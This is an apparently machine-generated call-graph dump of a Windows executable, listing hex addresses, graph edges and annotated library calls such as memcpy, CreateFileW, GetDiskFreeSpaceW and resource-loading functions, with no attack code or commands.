40349->40350 40351 40aa04 ??3@YAXPAX 40350->40351 40352 40ceed 40351->40352 40353 40aa04 ??3@YAXPAX 40352->40353 40353->40323 40355 40aa33 40354->40355 40361 40aa63 40354->40361 40356 40aa44 40355->40356 40357 40aa38 wcslen 40355->40357 40358 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 40356->40358 40357->40356 40359 40aa4d 40358->40359 40360 40aa51 memcpy 40359->40360 40359->40361 40360->40361 40361->40323 40361->40327 40362->40336 40363->40341 40364->40331 40365->40337 40366->40342 40367->40332 40368->40348 40369->40306 40370->39531 40371->39539 40448 44def7 40449 44df07 40448->40449 40450 44df00 ??3@YAXPAX 40448->40450 40451 44df17 40449->40451 40452 44df10 ??3@YAXPAX 40449->40452 40450->40449 40453 44df27 40451->40453 40454 44df20 ??3@YAXPAX 40451->40454 40452->40451 40455 44df37 40453->40455 40456 44df30 ??3@YAXPAX 40453->40456 40454->40453 40456->40455 37676 44dea5 37677 44deb5 FreeLibrary 37676->37677 37678 44dec3 37676->37678 37677->37678 37866 4426a9 37871 4324d3 37866->37871 37868 4426d2 37885 431a7b 37868->37885 37870 4426e3 37870->37870 37872 4324e3 37871->37872 37873 4324da 37871->37873 37877 4324e8 37872->37877 37957 43240a 12 API calls 37872->37957 37953 415a91 37873->37953 37876 4324fd 37878 432513 37876->37878 37879 432508 37876->37879 37877->37868 37959 43034a 37878->37959 37958 4325ad memset 37879->37958 37882 43250e 37882->37868 37883 432548 37884 43034a memcpy 37883->37884 37884->37882 37886 431aa3 37885->37886 37942 431b2e 37885->37942 37886->37942 37964 43817e 37886->37964 37889 432116 37997 4325ad memset 37889->37997 37892 432122 37892->37870 37894 431ad5 37895 431b04 37894->37895 37894->37942 37969 42faf4 12 API calls 37894->37969 37970 42ff8c 37895->37970 37896 431b15 37897 431baa 37896->37897 37898 431b7c memcmp 37896->37898 37896->37942 37901 431bb0 37897->37901 37902 431bcb 37897->37902 37898->37897 37917 431b95 37898->37917 37979 4169a7 11 API calls 37901->37979 37905 431bd1 37902->37905 37906 431c45 37902->37906 37907 43034a memcpy 37905->37907 37981 4165ff 37906->37981 37908 431bdc 37907->37908 37908->37942 37980 430468 11 API calls 37908->37980 37911 431c65 37912 431cba 37911->37912 37911->37942 37984 42bf4c 14 API calls 37911->37984 37915 415a91 memset 37912->37915 37914 431bef 37914->37911 37914->37917 37914->37942 37918 431d17 37915->37918 37916 431ca1 37916->37942 37985 42bfcf memcpy 37916->37985 37917->37942 37978 4169a7 11 API calls 37917->37978 37919 431d27 memcpy 37918->37919 37918->37942 37927 431da8 37919->37927 37935 431e97 37919->37935 37921 431eb8 37987 4169a7 11 API calls 37921->37987 37922 431f3c 37924 431fc3 37922->37924 37925 431f45 37922->37925 37990 4397fd memset 37924->37990 37988 4172c8 memset 37925->37988 37927->37921 37929 431e12 memcpy 37927->37929 37927->37935 37927->37942 37986 430af5 16 API calls 37927->37986 37928 431fd4 37928->37942 37991 4328e4 12 API calls 37928->37991 37929->37927 37933 431feb 37992 4233ae 11 API calls 37933->37992 37935->37922 37937 431f6a 37935->37937 37936 431ffc 37938 43202e 37936->37938 37941 4165ff 11 API calls 37936->37941 37937->37942 37989 4169a7 11 API calls 37937->37989 37993 42fe8b 22 API calls 37938->37993 37941->37938 37996 42c02e memset 37942->37996 37943 432057 37943->37942 37994 431917 23 API calls 37943->37994 37945 432079 37995 430b5d 11 API calls 37945->37995 37954 415a9d 37953->37954 37955 415ab3 37954->37955 37956 415aa4 memset 37954->37956 37955->37872 37956->37955 37957->37876 37958->37882 37960 43034e 37959->37960 37962 430359 37959->37962 37963 415c23 memcpy 37960->37963 37962->37883 37963->37962 37965 438187 37964->37965 37967 431ab6 37964->37967 37998 4380f6 37965->37998 37967->37896 37967->37942 37968 43041c 12 API calls 37967->37968 37968->37894 37969->37895 37971 43817e 138 API calls 37970->37971 37973 42ff99 37971->37973 37972 42ff9d 37972->37896 37973->37972 37974 42ffe3 37973->37974 37975 42ffd0 37973->37975 38486 4169a7 11 API calls 37974->38486 38485 4169a7 11 API calls 37975->38485 37978->37942 37979->37942 37980->37914 37982 4165a0 11 API calls 37981->37982 37983 41660d 37982->37983 37983->37911 37984->37916 37985->37912 37986->37927 37987->37942 37988->37942 37989->37942 37990->37928 37991->37933 37992->37936 37993->37943 37994->37945 37996->37889 37997->37892 38000 43811f 37998->38000 37999 438164 37999->37967 38000->37999 38003 437e5e 38000->38003 38026 4300e8 memset memset memcpy 38000->38026 38027 437d3c 38003->38027 38005 437eb3 38005->38000 38006 437ea9 38006->38005 38012 437f22 38006->38012 38042 41f432 38006->38042 38009 437f06 38089 415c56 11 API calls 38009->38089 38010 437f7f 38013 437f95 38010->38013 38015 43802b 38010->38015 38012->38010 38090 432d4e 38012->38090 38094 415c56 11 API calls 38013->38094 38017 4165ff 11 API calls 38015->38017 38018 438054 38017->38018 38053 437371 38018->38053 38021 43806b 38022 438094 38021->38022 38095 42f50e 137 API calls 38021->38095 38024 437fa3 38022->38024 38096 4300e8 memset memset memcpy 38022->38096 38024->38005 38097 41f638 103 API calls 38024->38097 38026->38000 38028 437d69 38027->38028 38031 437d80 38027->38031 38110 437ccb 11 API calls 38028->38110 38030 437d76 38030->38006 38031->38030 38032 437da3 38031->38032 38033 437d90 38031->38033 38098 438460 38032->38098 38033->38030 38114 437ccb 11 API calls 38033->38114 38036 437de8 38113 424f26 122 API calls 38036->38113 38038 437dcb 38038->38036 38111 444283 13 API calls 38038->38111 38040 437dfc 38112 437ccb 11 API calls 38040->38112 38043 41f54d 38042->38043 38049 41f44f 38042->38049 38044 41f466 38043->38044 38285 41c635 memset memset 38043->38285 38044->38009 38044->38012 38049->38044 38051 41f50b 38049->38051 38256 41f1a5 38049->38256 38281 41c06f memcmp 38049->38281 38282 41f3b1 89 API calls 38049->38282 38283 41f398 85 API calls 38049->38283 38051->38043 38051->38044 38284 41c295 85 API calls 38051->38284 38054 41703f 11 API calls 38053->38054 38055 437399 38054->38055 38056 43739d 38055->38056 38058 4373ac 38055->38058 38393 4446ea 11 API calls 38056->38393 38059 416935 16 API calls 38058->38059 38060 4373ca 38059->38060 38062 438460 133 API calls 38060->38062 38070 415a91 memset 38060->38070 38073 43758f 38060->38073 38085 437584 38060->38085 38088 437d3c 134 API calls 38060->38088 38375 4251c4 38060->38375 38394 425433 13 API calls 38060->38394 38395 425413 17 API calls 38060->38395 38396 42533e 16 API calls 38060->38396 38397 42538f 16 API calls 38060->38397 38398 42453e 122 API calls 38060->38398 38061 4375bc 38064 415c7d 16 API calls 38061->38064 38062->38060 38065 4375d2 38064->38065 38087 4373a7 38065->38087 38401 4442e6 38065->38401 38068 4375e2 38068->38087 38408 444283 13 API calls 38068->38408 38070->38060 38399 42453e 122 API calls 38073->38399 38074 4375f4 38079 437620 38074->38079 38080 43760b 38074->38080 38078 43759f 38081 416935 16 API calls 38078->38081 38083 416935 16 API calls 38079->38083 38409 444283 13 API calls 38080->38409 38081->38085 38083->38087 38085->38061 38400 42453e 122 API calls 38085->38400 38086 437612 memcpy 38086->38087 38087->38021 38088->38060 38089->38005 38091 432d58 38090->38091 38093 432d65 38090->38093 38484 432cc4 memset memset memcpy 38091->38484 38093->38010 38094->38024 38095->38022 38096->38024 38097->38005 38115 41703f 38098->38115 38100 43847a 38101 43848a 38100->38101 38102 43847e 38100->38102 38122 438270 38101->38122 38152 4446ea 11 API calls 38102->38152 38106 438488 38106->38038 38108 4384bb 38109 438270 133 API calls 38108->38109 38109->38106 38110->38030 38111->38040 38112->38036 38113->38030 38114->38030 38116 417044 38115->38116 38117 41705c 38115->38117 38121 417055 38116->38121 38154 416760 11 API calls 38116->38154 38118 417075 38117->38118 38155 41707a 11 API calls 38117->38155 38118->38100 38121->38100 38123 415a91 memset 38122->38123 38124 43828d 38123->38124 38125 438297 38124->38125 38126 438341 38124->38126 38128 4382d6 38124->38128 38127 415c7d 16 API calls 38125->38127 38156 44358f 38126->38156 38130 438458 38127->38130 38131 4382fb 38128->38131 38132 4382db 38128->38132 38130->38106 38153 424f26 122 API calls 38130->38153 38199 415c23 memcpy 38131->38199 38187 416935 38132->38187 38135 4382e9 38195 415c7d 38135->38195 38136 438305 38139 44358f 19 API calls 38136->38139 38141 438318 38136->38141 38138 438373 38145 438383 38138->38145 38200 4300e8 memset memset memcpy 38138->38200 38139->38141 38141->38138 38182 43819e 38141->38182 38143 4383f5 38148 438404 38143->38148 38149 43841c 38143->38149 38144 4383cd 38144->38143 38202 42453e 122 API calls 38144->38202 38145->38144 38201 415c23 memcpy 38145->38201 38151 416935 16 API calls 38148->38151 38150 416935 16 API calls 38149->38150 38150->38125 38151->38125 38152->38106 38153->38108 38154->38121 38155->38116 38157 4435be 38156->38157 38158 443676 38157->38158 38165 4436ce 38157->38165 38166 44366c 38157->38166 38180 44360c 38157->38180 38203 442ff8 38157->38203 38160 442ff8 19 API calls 38158->38160 38163 443737 38158->38163 38164 443758 38158->38164 38160->38163 38161 442ff8 19 API calls 38161->38164 38163->38161 38170 443775 38164->38170 38212 441409 memset 38164->38212 38168 4165ff 11 API calls 38165->38168 38211 4169a7 11 API calls 38166->38211 38167 4437be 38172 4437de 38167->38172 38214 416760 11 API calls 38167->38214 38168->38158 38170->38167 38213 415c56 11 API calls 38170->38213 38175 443801 38172->38175 38215 42463b memset memcpy 38172->38215 38174 443826 38217 43bd08 memset 38174->38217 38175->38174 38216 43024d memset 38175->38216 38179 443837 38179->38180 38218 43024d memset 38179->38218 38180->38141 38183 438246 38182->38183 38185 4381ba 38182->38185 38183->38138 38184 41f432 109 API calls 38184->38185 38185->38183 38185->38184 38234 41f638 103 API calls 38185->38234 38188 41693e 38187->38188 38191 41698e 38187->38191 38189 41694c 38188->38189 38235 422fd1 memset 38188->38235 38189->38191 38236 4165a0 38189->38236 38191->38135 38196 415c81 38195->38196 38197 415c9c 38195->38197 38196->38197 38198 416935 16 API calls 38196->38198 38197->38125 38198->38197 38199->38136 38200->38145 38201->38144 38202->38143 38209 442ffe 38203->38209 38204 443094 38233 4414a9 12 API calls 38204->38233 38207 443092 38207->38157 38209->38204 38209->38207 38219 4414ff 38209->38219 38231 4169a7 11 API calls 38209->38231 38232 441325 memset 38209->38232 38211->38158 38212->38164 38213->38167 38214->38172 38215->38175 38216->38174 38217->38179 38218->38179 38220 441539 38219->38220 38223 441547 38219->38223 38222 441575 38220->38222 38220->38223 38224 441582 38220->38224 38221 4418e2 38227 4418ea 38221->38227 38228 4414a9 12 API calls 38221->38228 38225 42fccf 18 API calls 38222->38225 38223->38221 38230 442bd4 38223->38230 38226 43275a 12 API calls 38224->38226 38225->38223 38226->38223 38227->38209 38228->38227 38229 441409 memset 38229->38230 38230->38227 38230->38229 38231->38209 38232->38209 38233->38207 38234->38185 38235->38189 38242 415cfe 38236->38242 38241 422b84 15 API calls 38241->38191 38246 415d23 __aullrem __aulldvrm 38242->38246 38249 41628e 38242->38249 38243 4163ca 38244 416422 10 API calls 38243->38244 38244->38249 38245 416172 memset 38245->38246 38246->38243 38246->38245 38247 416422 10 API calls 38246->38247 38248 415cb9 10 API calls 38246->38248 38246->38249 38247->38246 38248->38246 38250 416520 38249->38250 38251 416527 38250->38251 38255 416574 38250->38255 38252 415700 10 API calls 38251->38252 38253 416544 38251->38253 38251->38255 38252->38253 38254 416561 memcpy 38253->38254 38253->38255 38254->38255 38255->38191 38255->38241 38286 41bc3b 38256->38286 38259 41edad 85 API calls 38260 41f1cb 38259->38260 38261 41f1f5 memcmp 38260->38261 38262 41f20e 38260->38262 38266 41f282 38260->38266 38261->38262 38263 41f21b memcmp 38262->38263 38262->38266 38264 41f326 38263->38264 38267 41f23d 38263->38267 38265 41ee6b 85 API calls 38264->38265 38264->38266 38265->38266 38266->38049 38267->38264 38268 41f28e memcmp 38267->38268 38310 41c8df 55 API calls 38267->38310 38268->38264 38269 41f2a9 38268->38269 38269->38264 38272 41f308 38269->38272 38273 41f2d8 38269->38273 38271 41f269 38271->38264 38274 41f287 38271->38274 38275 41f27a 38271->38275 38272->38264 38315 4446ce 11 API calls 38272->38315 38276 41ee6b 85 API calls 38273->38276 38274->38268 38277 41ee6b 85 API calls 38275->38277 38278 41f2e0 38276->38278 38277->38266 38311 41b1ca 38278->38311 38281->38049 38282->38049 38283->38049 38284->38043 38285->38044 38287 41bc54 38286->38287 38294 41be0b 38286->38294 38287->38294 38298 41bd61 38287->38298 38301 41bc8d 38287->38301 38316 41baf0 54 API calls 38287->38316 38290 41be45 38290->38259 38290->38266 38292 41be04 38323 41aee4 55 API calls 38292->38323 38294->38298 38324 41ae17 34 API calls 38294->38324 38295 41bd42 38295->38292 38296 41bdd8 memset 38295->38296 38297 41bdba 38295->38297 38295->38298 38299 41bde7 memcmp 38296->38299 38309 4175ed 6 API calls 38297->38309 38298->38290 38325 41a25f memset 38298->38325 38299->38292 38303 41bdfd 38299->38303 38300 41bd18 38300->38295 38300->38298 38321 41a9da 85 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38300->38321 38301->38295 38301->38298 38301->38300 38317 4151e3 38301->38317 38302 41bdcc 38302->38298 38302->38299 38322 41a1b0 memset 38303->38322 38309->38302 38310->38271 38312 41b1e4 38311->38312 38314 41b243 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38312->38314 38374 41a1b0 memset 38312->38374 38314->38266 38315->38264 38316->38301 38326 41837f 38317->38326 38320 444706 11 API calls 38320->38300 38321->38295 38322->38292 38323->38294 38324->38298 38325->38290 38327 4183c1 38326->38327 38328 4183ca 38326->38328 38372 418197 25 API calls 38327->38372 38331 4151f9 38328->38331 38346 418160 38328->38346 38331->38300 38331->38320 38332 4183e5 38332->38331 38355 41739b 38332->38355 38335 418444 CreateFileW 38336 41845f 38335->38336 38337 4184c2 memset 38336->38337 38338 41847e GetLastError ??3@YAXPAX 38336->38338 38358 418758 38337->38358 38340 4184b5 38338->38340 38341 418497 38338->38341 38373 444706 11 API calls 38340->38373 38343 41837f 49 API calls 38341->38343 38343->38331 38347 41739b GetVersionExW 38346->38347 38348 418165 38347->38348 38350 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 38348->38350 38351 418178 38350->38351 38352 41817f 38351->38352 38353 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 38351->38353 38352->38332 38354 418188 ??3@YAXPAX 38353->38354 38354->38332 38356 4173d6 38355->38356 38357 4173ad GetVersionExW 38355->38357 38356->38335 38356->38336 38357->38356 38359 418680 43 API calls 38358->38359 38360 418782 38359->38360 38361 418506 ??3@YAXPAX 38360->38361 38362 418160 11 API calls 38360->38362 38361->38331 38363 418799 38362->38363 38363->38361 38364 41739b GetVersionExW 38363->38364 38365 4187a7 38364->38365 38366 4187da 38365->38366 38371 4187ad GetDiskFreeSpaceW 38365->38371 38367 4187ec GetDiskFreeSpaceA 38366->38367 38370 4187e8 38366->38370 38369 418800 ??3@YAXPAX 38367->38369 38369->38361 38370->38367 38371->38369 38372->38328 38373->38331 38374->38314 38410 424f07 38375->38410 38377 4251e4 38378 4251f7 38377->38378 38379 4251e8 38377->38379 38418 4250f8 38378->38418 38417 4446ea 11 API calls 38379->38417 38381 4251f2 38381->38060 38383 425209 38386 425249 38383->38386 38389 4250f8 126 API calls 38383->38389 38390 425287 38383->38390 38426 4384e9 134 API calls 38383->38426 38427 424f74 123 API calls 38383->38427 38384 415c7d 16 API calls 38384->38381 38386->38390 38428 424ff0 13 API calls 38386->38428 38389->38383 38390->38384 38391 425266 38391->38390 38429 415be9 memcpy 38391->38429 38393->38087 38394->38060 38395->38060 38396->38060 38397->38060 38398->38060 38399->38078 38400->38061 38402 4442eb 38401->38402 38405 444303 38401->38405 38482 41707a 11 API calls 38402->38482 38404 4442f2 38404->38405 38483 4446ea 11 API calls 38404->38483 38405->38068 38407 444300 38407->38068 38408->38074 38409->38086 38411 424f1f 38410->38411 38412 424f0c 38410->38412 38431 424eea 11 API calls 38411->38431 38430 416760 11 API calls 38412->38430 38415 424f18 38415->38377 38416 424f24 38416->38377 38417->38381 38419 425108 38418->38419 38425 42510d 38418->38425 38464 424f74 123 API calls 38419->38464 38422 42516e 38424 415c7d 16 API calls 38422->38424 38423 425115 38423->38383 38424->38423 38425->38423 38432 42569b 38425->38432 38426->38383 38427->38383 38428->38391 38429->38390 38430->38415 38431->38416 38443 4256f1 38432->38443 38460 4259c2 38432->38460 38437 4259da 38475 416760 11 API calls 38437->38475 38438 4260dd 38476 424251 119 API calls 38438->38476 38439 429a4d 38446 429a66 38439->38446 38447 429a9b 38439->38447 38443->38437 38443->38439 38444 422aeb memset memcpy memcpy 38443->38444 38450 4260a1 38443->38450 38458 429ac1 38443->38458 38443->38460 38463 425a38 38443->38463 38465 4227f0 memset memcpy 38443->38465 38466 422b84 15 API calls 38443->38466 38467 422b5d memset memcpy memcpy 38443->38467 38468 422640 13 API calls 38443->38468 38470 4241fc 11 API calls 38443->38470 38471 42413a 89 API calls 38443->38471 38444->38443 38477 415c56 11 API calls 38446->38477 38449 429a96 38447->38449 38479 416760 11 API calls 38447->38479 38480 424251 119 API calls 38449->38480 38474 415c56 11 API calls 38450->38474 38451 429a7a 38478 416760 11 API calls 38451->38478 38459 425ad6 38458->38459 38481 415c56 11 API calls 38458->38481 38459->38422 38460->38459 38469 415c56 11 API calls 38460->38469 38463->38460 38472 422640 13 API calls 38463->38472 38473 4226e0 12 API calls 38463->38473 38464->38425 38465->38443 38466->38443 38467->38443 38468->38443 38469->38437 38470->38443 38471->38443 38472->38463 38473->38463 38474->38437 38475->38438 38476->38459 38477->38451 38478->38449 38479->38449 38480->38458 38481->38437 38482->38404 38483->38407 38484->38093 38485->37972 38486->37972 40457 4148b6 FindResourceW 40458 4148cf SizeofResource 40457->40458 40461 4148f9 40457->40461 40459 4148e0 LoadResource 40458->40459 40458->40461 40460 4148ee LockResource 40459->40460 40459->40461 40460->40461 37860 415304 ??3@YAXPAX 37679 415320 realloc 37680 415340 37679->37680 37681 41534d 37679->37681 37683 416760 11 API calls 37681->37683 37683->37680 40372 427533 40375 427548 40372->40375 40386 425711 40372->40386 40373 4259da 40429 416760 11 API calls 40373->40429 40374 4275cb 40409 425506 40374->40409 40375->40374 40382 429b7a 40375->40382 40377 4259c2 40405 425ad6 40377->40405 40423 415c56 11 API calls 40377->40423 40378 4260dd 40430 424251 119 API calls 40378->40430 40435 4446ce 11 API calls 40382->40435 40385 429a4d 40391 429a66 40385->40391 40392 429a9b 40385->40392 40386->40373 40386->40377 40386->40385 40389 422aeb memset memcpy memcpy 40386->40389 40395 4260a1 40386->40395 40402 429ac1 40386->40402 40408 425a38 40386->40408 40419 4227f0 memset memcpy 40386->40419 40420 422b84 15 API calls 40386->40420 40421 422b5d memset memcpy memcpy 40386->40421 40422 422640 13 API calls 40386->40422 40424 4241fc 11 API calls 40386->40424 40425 42413a 89 API calls 40386->40425 40389->40386 40431 415c56 11 API calls 40391->40431 40394 429a96 40392->40394 40433 416760 11 API calls 40392->40433 40434 424251 119 API calls 40394->40434 40428 415c56 11 API calls 40395->40428 40396 429a7a 40432 416760 11 API calls 40396->40432 40402->40373 40402->40405 40436 415c56 11 API calls 40402->40436 40408->40377 40426 422640 13 API calls 40408->40426 40427 4226e0 12 API calls 40408->40427 40410 425554 40409->40410 40411 42554d 40409->40411 40438 422586 12 API calls 40410->40438 40437 423b34 102 API calls 40411->40437 40414 425567 40415 4255ba 40414->40415 40416 42556c memset 40414->40416 40415->40386 40417 425596 40416->40417 40417->40415 40418 4255a4 memset 40417->40418 40418->40415 40419->40386 40420->40386 40421->40386 40422->40386 40423->40373 40424->40386 40425->40386 40426->40408 40427->40408 40428->40373 40429->40378 40430->40405 40431->40396 40432->40394 40433->40394 40434->40402 40435->40402 40436->40373 40437->40410 40438->40414 40463 441b3f 40473 43a9f6 40463->40473 40465 441b61 40646 4386af memset 40465->40646 40467 44189a 40469 4418e2 40467->40469 40470 442bd4 40467->40470 40468 4418ea 40469->40468 40647 4414a9 12 API calls 40469->40647 40470->40468 40648 441409 memset 40470->40648 40474 43aa20 40473->40474 40475 43aadf 40473->40475 40474->40475 40476 43aa34 memset 40474->40476 40475->40465 40477 43aa56 40476->40477 40478 43aa4d 40476->40478 40649 43a6e7 40477->40649 40657 42c02e memset 40478->40657 40483 43aad3 40659 4169a7 11 API calls 40483->40659 40484 43aaae 40484->40475 40484->40483 40499 43aae5 40484->40499 40485 43ac18 40488 43ac47 40485->40488 40661 42bbd5 memcpy memcpy memcpy memset memcpy 40485->40661 40489 43aca8 40488->40489 40662 438eed 16 API calls 40488->40662 40493 43acd5 40489->40493 40664 4233ae 11 API calls 40489->40664 40492 43ac87 40663 4233c5 16 API calls 40492->40663 40665 423426 11 API calls 40493->40665 40497 43ace1 40666 439811 162 API calls 40497->40666 40498 43a9f6 160 API calls 40498->40499 40499->40475 40499->40485 40499->40498 40660 439bbb 22 API calls 40499->40660 40501 43acfd 40506 43ad2c 40501->40506 40667 438eed 16 API calls 40501->40667 40503 43ad19 40668 4233c5 16 API calls 40503->40668 40505 43ad58 40669 44081d 162 API calls 40505->40669 40506->40505 40509 43add9 40506->40509 40673 423426 11 API calls 40509->40673 40510 43ae3a memset 40511 43ae73 40510->40511 40674 42e1c0 146 API calls 40511->40674 40512 43adab 40671 438c4e 162 API calls 40512->40671 40513 43ad6c 40513->40475 40513->40512 40670 42370b memset memcpy memset 40513->40670 40517 43adcc 40672 440f84 12 API calls 40517->40672 40518 43ae96 40675 42e1c0 146 API calls 40518->40675 40521 43aea8 40522 43aec1 40521->40522 40676 42e199 146 API calls 40521->40676 40523 43af00 40522->40523 40677 42e1c0 146 API calls 40522->40677 40523->40475 40527 43af1a 40523->40527 40528 43b3d9 40523->40528 40678 438eed 16 API calls 40527->40678 40534 43b3f6 40528->40534 40536 43b4c8 40528->40536 40529 43b60f 40529->40475 40737 4393a5 17 API calls 40529->40737 40532 43af2f 40679 4233c5 16 API calls 40532->40679 40719 432878 12 API calls 40534->40719 40535 43af51 40680 423426 11 API calls 40535->40680 40538 43b4f2 40536->40538 40725 42bbd5 memcpy memcpy memcpy memset memcpy 40536->40725 40726 43a76c 21 API calls 40538->40726 40540 43af7d 40681 423426 11 API calls 40540->40681 40544 43b529 40727 44081d 162 API calls 40544->40727 40545 43b462 40721 423330 11 API calls 40545->40721 40546 43af94 40682 423330 11 API calls 40546->40682 40550 43afca 40683 423330 11 API calls 40550->40683 40551 43b47e 40555 43b497 40551->40555 40722 42374a memcpy memset memcpy memcpy memcpy 40551->40722 40552 43b544 40556 43b55c 40552->40556 40728 42c02e memset 40552->40728 40553 43b428 40553->40545 40720 432b60 16 API calls 40553->40720 40723 4233ae 11 API calls 40555->40723 40729 43a87a 162 API calls 40556->40729 40558 43afdb 40684 4233ae 11 API calls 40558->40684 40563 43b56c 40567 43b58a 40563->40567 40730 423330 11 API calls 40563->40730 40564 43b4b1 40724 423399 11 API calls 40564->40724 40566 43afee 40685 44081d 162 API calls 40566->40685 40731 440f84 12 API calls 40567->40731 40568 43b4c1 40733 42db80 162 API calls 40568->40733 40573 43b592 40732 43a82f 16 API calls 40573->40732 40576 43b5b4 40734 438c4e 162 API calls 40576->40734 40578 43b5cf 40735 42c02e memset 40578->40735 40580 43b005 40580->40475 40584 43b01f 40580->40584 40686 42d836 162 API calls 40580->40686 40581 43b1ef 40696 4233c5 16 API calls 40581->40696 40584->40581 40694 423330 11 API calls 40584->40694 40695 42d71d 162 API calls 40584->40695 40585 43b212 40697 423330 11 API calls 40585->40697 40587 43b087 40687 4233ae 11 API calls 40587->40687 40588 43add4 40588->40529 40736 438f86 16 API calls 40588->40736 40591 43b22a 40698 42ccb5 11 API calls 40591->40698 40594 43b23f 40699 4233ae 11 API calls 40594->40699 40595 43b10f 40690 423330 11 API calls 40595->40690 40597 43b257 40700 4233ae 11 API calls 40597->40700 40601 43b129 40691 4233ae 11 API calls 40601->40691 40602 43b26e 40701 4233ae 11 API calls 40602->40701 40605 43b09a 40605->40595 40688 42cc15 19 API calls 40605->40688 40689 4233ae 11 API calls 40605->40689 40606 43b282 40702 43a87a 162 API calls 40606->40702 40608 43b13c 40692 440f84 12 API calls 40608->40692 40610 43b29d 40703 423330 11 API calls 40610->40703 40613 43b15f 40693 4233ae 11 API calls 40613->40693 40614 43b2af 40615 43b2b8 40614->40615 40616 43b2ce 40614->40616 40704 4233ae 11 API calls 40615->40704 40705 440f84 12 API calls 40616->40705 40620 43b2c9 40707 4233ae 11 API calls 40620->40707 40621 43b2da 40706 42370b memset memcpy memset 40621->40706 40624 43b2f9 40708 423330 11 API calls 40624->40708 40626 43b30b 40709 423330 11 API calls 40626->40709 40628 43b325 40710 423399 11 API calls 40628->40710 40630 43b332 40711 4233ae 11 API calls 40630->40711 40632 43b354 40712 423399 11 API calls 40632->40712 40634 43b364 40713 43a82f 16 API calls 40634->40713 40636 43b370 40714 42db80 162 API calls 40636->40714 40638 43b380 40715 438c4e 162 API calls 40638->40715 40640 43b39e 40716 423399 11 API calls 40640->40716 40642 43b3ae 40717 43a76c 21 API calls 40642->40717 40644 43b3c3 40718 423399 11 API calls 40644->40718 40646->40467 40647->40468 40648->40470 40650 43a6f5 40649->40650 40651 43a765 40649->40651 40650->40651 40738 42a115 40650->40738 40651->40475 40658 4397fd memset 40651->40658 40655 43a73d 40655->40651 40656 42a115 146 API calls 40655->40656 40656->40651 40657->40477 40658->40484 40659->40475 40660->40499 40661->40488 40662->40492 40663->40489 40664->40493 40665->40497 40666->40501 40667->40503 40668->40506 40669->40513 40670->40512 40671->40517 40672->40588 40673->40510 40674->40518 40675->40521 40676->40522 40677->40522 40678->40532 40679->40535 40680->40540 40681->40546 40682->40550 40683->40558 40684->40566 40685->40580 40686->40587 40687->40605 40688->40605 40689->40605 40690->40601 40691->40608 40692->40613 40693->40584 40694->40584 40695->40584 40696->40585 40697->40591 40698->40594 40699->40597 40700->40602 40701->40606 40702->40610 40703->40614 40704->40620 40705->40621 40706->40620 40707->40624 40708->40626 40709->40628 40710->40630 40711->40632 40712->40634 40713->40636 40714->40638 40715->40640 40716->40642 40717->40644 40718->40588 40719->40553 40720->40545 40721->40551 40722->40555 40723->40564 40724->40568 40725->40538 40726->40544 40727->40552 40728->40556 40729->40563 40730->40567 40731->40573 40732->40568 40733->40576 40734->40578 40735->40588 40736->40529 40737->40475 40739 42a175 40738->40739 40741 42a122 40738->40741 40739->40651 40744 42b13b 146 API calls 40739->40744 40741->40739 40742 42a115 146 API calls 40741->40742 40745 43a174 40741->40745 40769 42a0a8 146 API calls 40741->40769 40742->40741 40744->40655 40759 43a196 40745->40759 40760 43a19e 40745->40760 40746 43a306 40746->40759 40774 4388c4 14 API calls 40746->40774 40748 42ff8c 138 API calls 40748->40760 40749 42a115 146 API calls 40749->40760 40750 415a91 memset 40750->40760 40751 43a642 40751->40759 40778 4169a7 11 API calls 40751->40778 40753 4165ff 11 API calls 40753->40760 40755 43a635 40777 42c02e memset 40755->40777 40759->40741 40760->40746 40760->40748 40760->40749 40760->40750 40760->40753 40760->40759 40770 439504 13 API calls 40760->40770 40771 4312d0 146 API calls 40760->40771 40772 42be4c memcpy memcpy memcpy memset memcpy 40760->40772 40773 43a121 11 API calls 40760->40773 40762 42bf4c 14 API calls 40764 43a325 40762->40764 40763 4169a7 11 API calls 40763->40764 40764->40751 40764->40755 40764->40759 40764->40762 40764->40763 40765 42b5b5 memset memcpy 40764->40765 40768 4165ff 11 API calls 40764->40768 40775 42b63e 14 API calls 40764->40775 40776 42bfcf memcpy 40764->40776 40765->40764 40768->40764 40769->40741 40770->40760 40771->40760 40772->40760 40773->40760 40774->40764 40775->40764 40776->40764 40777->40751 40778->40759 40805 41493c EnumResourceNamesW 37685 4287c1 37686 4287d2 37685->37686 37687 429ac1 37685->37687 37688 428818 37686->37688 37689 42881f 37686->37689 37709 425711 37686->37709 37699 425ad6 37687->37699 37755 415c56 11 API calls 37687->37755 37722 42013a 37688->37722 37750 420244 96 API calls 37689->37750 37693 4260dd 37749 424251 119 API calls 37693->37749 37695 4259da 37748 416760 11 API calls 37695->37748 37700 429a4d 37705 429a66 37700->37705 37706 429a9b 37700->37706 37703 422aeb memset memcpy memcpy 37703->37709 37751 415c56 11 API calls 37705->37751 37708 429a96 37706->37708 37753 416760 11 API calls 37706->37753 37754 424251 119 API calls 37708->37754 37709->37687 37709->37695 37709->37700 37709->37703 37710 4260a1 37709->37710 37718 4259c2 37709->37718 37721 425a38 37709->37721 37738 4227f0 memset memcpy 37709->37738 37739 422b84 15 API calls 37709->37739 37740 422b5d memset memcpy memcpy 37709->37740 37741 422640 13 API calls 37709->37741 37743 4241fc 11 API calls 37709->37743 37744 42413a 89 API calls 37709->37744 37747 415c56 11 API calls 37710->37747 37711 429a7a 37752 416760 11 API calls 37711->37752 37718->37699 37742 415c56 11 API calls 37718->37742 37721->37718 37745 422640 13 API calls 37721->37745 37746 4226e0 12 API calls 37721->37746 37723 42014c 37722->37723 37726 420151 37722->37726 37765 41e466 96 API calls 37723->37765 37725 420162 37725->37709 37726->37725 37727 4201b3 37726->37727 37728 420229 37726->37728 37729 4201b8 37727->37729 37730 4201dc 37727->37730 37728->37725 37731 41fd5e 85 API calls 37728->37731 37756 41fbdb 37729->37756 37730->37725 37735 4201ff 37730->37735 37762 41fc4c 37730->37762 37731->37725 37735->37725 37737 42013a 96 API calls 37735->37737 37737->37725 37738->37709 37739->37709 37740->37709 37741->37709 37742->37695 37743->37709 37744->37709 37745->37721 37746->37721 37747->37695 37748->37693 37749->37699 37750->37709 37751->37711 37752->37708 37753->37708 37754->37687 37755->37695 37757 41fbf8 37756->37757 37760 